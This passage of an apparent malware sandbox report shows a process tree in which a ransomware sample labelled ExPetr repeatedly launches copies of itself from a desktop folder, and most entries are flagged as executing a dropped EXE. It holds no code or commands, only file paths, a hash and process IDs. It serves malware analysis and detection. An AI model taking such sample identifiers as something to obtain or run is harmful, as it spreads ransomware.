              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6864
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6912
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6124
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6112
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6104
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6100
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6080
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6068
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6060
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6052
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5956
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5948
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6136
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5124
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:3180
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5132
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:1196
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6488
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5380
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5644
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5628
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6164
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6180
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5588
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5560
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6304
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6148
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5636
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5384
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6160
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5596
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5580
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6432
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:5932
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6172
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                  PID:5424
                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                  4⤵
                    PID:5836
                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                    4⤵
                      PID:2920
                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                      4⤵
                        PID:5776
                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                        4⤵
                          PID:5220
                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                          4⤵
                            PID:5300
                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                            4⤵
                              PID:4060
                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                              4⤵
                                PID:4840
                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                4⤵
                                  PID:6272
                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                  4⤵
                                    PID:6264
                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                    4⤵
                                      PID:5352
                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                      4⤵
                                        PID:6252
                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                        4⤵
                                          PID:6244
                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                          4⤵
                                            PID:6504
                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                            4⤵
                                              PID:6544
                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                              4⤵
                                                PID:5356
                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                4⤵
                                                  PID:6216
                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                  4⤵
                                                    PID:5420
                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                    4⤵
                                                      PID:5216
                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                      4⤵
                                                        PID:5540
                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                        4⤵
                                                          PID:5532
                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                          4⤵
                                                            PID:5584
                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                            4⤵
                                                              PID:2868
                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                              4⤵
                                                                PID:4732
                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                4⤵
                                                                  PID:5684
                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                  4⤵
                                                                    PID:5708
                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                    4⤵
                                                                      PID:5788
                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                      4⤵
                                                                        PID:4528
                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                        4⤵
                                                                          PID:5864
                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                          4⤵
                                                                            PID:3656
                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                            4⤵
                                                                              PID:5736
                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                              4⤵
                                                                                PID:4780
                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                4⤵
                                                                                  PID:3428
                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                  4⤵
                                                                                    PID:5912
                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                    4⤵
                                                                                      PID:5668
